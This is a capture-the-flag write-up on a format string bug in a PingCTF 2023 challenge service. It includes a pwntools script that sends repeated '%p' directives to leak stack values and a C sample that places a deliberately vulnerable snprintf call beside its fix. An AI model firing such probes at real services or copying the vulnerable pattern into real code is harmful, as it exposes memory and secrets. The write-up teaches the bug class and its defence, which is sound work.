# Pingctf 2023: pwn chall: without-love-it-cannot-be-seen

## Overview

We are given a netcat link:

```
nc without-love-it-cannot-be-seen.knping.pl 30001
```

Testing it, we find that the program asks us for a string and then echoes back what we just entered. The program also seems to compare our input to some other strings.

![image](https://hackmd.io/_uploads/Sk3N56BLp.png)

## Solve

Clearly, it is a format string vulnerability, so I tested it with multiple `%p` to see if there is anything we can use.

![image](https://hackmd.io/_uploads/ByztqTB8T.png)

![image](https://hackmd.io/_uploads/S1l5cTrIp.png)

![image](https://hackmd.io/_uploads/S1QocTrL6.png)

Doing this manually took a lot of time, so I created a simple Python script to send `%p` multiple times.

## Script

```
from pwn import *

# Connect to the challenge service
p = remote("without-love-it-cannot-be-seen.knping.pl", 30001)

# Build a payload of 20 "%p," directives, one leaked value per directive
format_string = b""
for i in range(20):
    format_string += b"%p,"
print(format_string)

# Send the payload and read the echoed output interactively
p.sendline(format_string)
p.interactive()
```

Running it, we got these results:

![image](https://hackmd.io/_uploads/BJAfiTHUa.png)

One output seems weird: `0x7866deafdeaf6687`. So I tried to use it and got the flag.

![image](https://hackmd.io/_uploads/H10Uj6SUa.png)
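
The bug class behind the `%p` leak, shown next to its fix. This is an added example, not code from the writeup or from the challenge. The service's source is not on the page, so the pattern is an assumption and `echo_vulnerable`, `echo_safe` and `count_directives` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Assumed shape of the bug (the service's source is not on the page):
 * the untrusted line is the format string, so each "%p" makes the
 * printf family print a register or stack word the caller never passed. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
int echo_vulnerable(char *out, size_t n, const char *line)
{
    return snprintf(out, n, line); /* normally flagged by -Wformat-security */
}
#pragma GCC diagnostic pop

/* Hardened form: constant format, the untrusted line is only data. */
int echo_safe(char *out, size_t n, const char *line)
{
    return snprintf(out, n, "%s", line);
}

/* Logging helper: counts '%' characters that start a conversion
 * ("%%" is a literal percent sign and is skipped). */
size_t count_directives(const char *line)
{
    size_t hits = 0;
    for (size_t i = 0; line[i] != '\0'; i++) {
        if (line[i] != '%')
            continue;
        if (line[i + 1] == '%')
            i++;                 /* escaped percent, not a directive */
        else if (line[i + 1] != '\0')
            hits++;
    }
    return hits;
}

int main(void)
{
    const char *probe = "%p,%p,%p,";   /* constructed sample input */
    char bad[128], good[128];

    echo_vulnerable(bad, sizeof bad, probe);
    echo_safe(good, sizeof good, probe);
    printf("vulnerable: %s\nsafe:       %s\ndirectives: %zu\n",
           bad, good, count_directives(probe));
    return 0;
}
```

Building without the pragmas and with `-Wformat -Wformat-security` makes the compiler report the non-literal format string at the vulnerable call.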